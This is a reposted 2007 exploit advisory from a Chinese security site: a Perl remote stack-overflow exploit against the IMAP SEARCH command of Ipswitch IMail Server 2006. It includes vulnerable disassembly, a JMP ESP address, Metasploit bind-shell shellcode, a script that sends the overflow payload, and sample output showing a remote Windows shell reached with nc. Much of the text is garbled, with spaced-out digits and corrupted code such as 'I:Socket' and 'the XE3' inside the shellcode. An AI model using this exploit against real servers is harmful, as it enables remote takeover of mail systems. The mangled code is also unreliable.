IPSwitch IMail Server 2 0 0 6 SEARCH Remote Stack Overflow Exploit-vulnerability warning-the black bar safety net

2007-07-26T00:00:00
ID MYHACK58:62200716299
Type myhack58
Reporter 佚名
Modified 2007-07-26T00:00:00

Description

!/ use/bin/perl

Ipswitch IMail Server 2 0 0 6 IMAP SEARCH COMMAND Stack Overflow Exploit

Author: ZhenHan.Liu#ph4nt0m.org

Date: 2007-07-25

Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)

Vuln Found by: Manuel Santamarina Suarez

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563

The Vuln code is here (imap4d32.exe version 6.8.8.1)

00418CCA |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]

00418CD0 |. 0FBE11 |MOVSX EDX,BYTE PTR DS:[ECX]

00418CD3 |. 83FA 2 2 |CMP EDX,2 2

00418CD6 |. 7 5 2A |JNZ SHORT IMAP4D32. 00418D02

00418CD8 |. 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]

00418CDE |. 5 0 |PUSH EAX ; /String

00418CDF |. FF15 8 4 0 0 4 3 0 0 |CALL DWORD PTR DS:[<&KERNEL32. lstrlenA>>; \lstrlenA

00418CE5 |. 83E8 0 2 |SUB EAX,2

00418CE8 |. 5 0 |PUSH EAX ; /maxlen

00418CE9 |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] ; |

00418CEF |. 83C1 0 1 |ADD ECX,1 ; |

00418CF2 |. 5 1 |PUSH ECX ; |src

00418CF3 |. 8D55 AC |LEA EDX,DWORD PTR SS:[EBP-5 4] ; |

00418CF6 |. 5 2 |PUSH EDX ; |dest

00418CF7 |. FF15 0 0 0 2 4 3 0 0 |CALL DWORD PTR DS:[<&MSVCR71. strncpy>] ; \strncpy

00418CFD |. 83C4 0C |ADD ESP,0C

00418D00 |. EB 1 3 |JMP SHORT IMAP4D32. 00418D15

00418D02 |> 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]

00418D08 |. 5 0 |PUSH EAX ; /src

00418D09 |. 8D4D AC |LEA ECX,DWORD PTR SS:[EBP-5 4] ; |

00418D0C |. 5 1 |PUSH ECX ; |dest

00418D0D |. E8 7E610100 |CALL <JMP.& amp;MSVCR71. strcpy> ; \strcpy

00418D12 |. 83C4 0 8 |ADD ESP,8

The programmer has made an extreamly stupid mistake.

He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy,

else strncpy.

the buffer overflow takes place when the strcpy is called.

But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src));

So, whether the command was started with a '"' or not, the stack overflow will take place immediately.

Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON".

But others like "SEARCH BEFORE" command will also trigger the overflow.

NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!!

Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20

Tested On Windows 2 0 0 3 SP1 CN

D:\>perl imap.pl 192.168.226.128 1 4 3

* OK IMAP4 Server (IMail 9.10)

0 OK LOGIN completed

* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)

* 1 EXISTS

* 1 RECENT

* OK [UIDVALIDITY 1 1 8 5 3 3 7 3 0 0] UIDs valid

* OK [UIDNEXT 4 8 5 3 3 7 3 0 2] Predicted next UID

2 OK [READ-WRITE] SELECT completed

-------------- [BEGIN] -------------------

---------------- [END] ------------------

D:\>nc-vv-n 192.168.226.128 1 1 5 4

(UNKNOWN) [192.168.226.128] 1 1 5 4 (?) open

Microsoft Windows [°æ±¾ 5.2.3790]

(C) °æÈËùÓÐ 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

use strict; use warnings; use I:Socket;

Target IP

my $host = shift ; my $port = shift ; my $account = "void"; my $password = "ph4nt0m.org";

my $pad1 = "void[at]ph4nt0m. org_" x 4 . "ph4nt0m"; my $pad2 = 'void[at]pstgroup'; my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2 0 0 0/xp/2 0 0 3 Universal

win32_bind - EXITFUNC=thread LPORT=1 1 5 4 Size=3 4 4 Encoder=Pex http://metasploit.com

my $shellcode = "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x 76\x0e\xb6". "\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x5e\x81\x07\x8a". "\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\xce\x79\x17\xfe". "\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x58\x49\x38\xec". "\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x8d\x2c\xdc\x5d". "\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\xe9\x64\xf9\x9e". "\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x3d\x3b\xc8\xfe". "\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\xf8\x 76\x14\x25". "\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\xe9\x2c\x07\xa5". "\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x37\x95\xf0\x77". "\the XE3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x60\x2b\xab\x26". "\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\xd0\x2b\x71\x94". "\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\the XE3\x87\x28\x1d". "\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\the XE3\x87\x28\x1d\x53\x31\x7e\x3c". "\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\xcf\xbe\x81\x22". "\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x3f\x9d\x92\x25". "\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x1c\x86\xba\x58". "\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x48\xcb\xee\x8a". "\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\xe7\x29\xad\x24". "\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x49\x4f\x07\xa5". "\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x59\xb6\x18\x15". "\xe5\x87\x2e\x8a\x66\x78\xf8\x75";

my $sock = I:Socket::INET->new( PeerHost=>$host, PeerPort=>$port, proto=>"tcp" ) || die "Connect error.\ n";

my $res = <$sock>; print $res; if( $res !~ /OK/ ) { exit(-1); }

login

print $sock "0 LOGIN $account $password\r\n"; print $res = <$sock>; if( $res !~ /0 OK/ ) { exit(-1); }

select

print $sock "1 SELECT INBOX\r\n"; while(1) { print $res = <$sock>; if($res =~ /1 OK/) the { last; } elsif($res =~ /1 NO/ || $res =~ /BAD/) { exit(-1); } else { next; } }

search

my $payload = $pad1.$ jmpesp.$ pad2.$ shellcode; print $sock "2 SEARCH ON <$payload>\r\n";

$sock->close();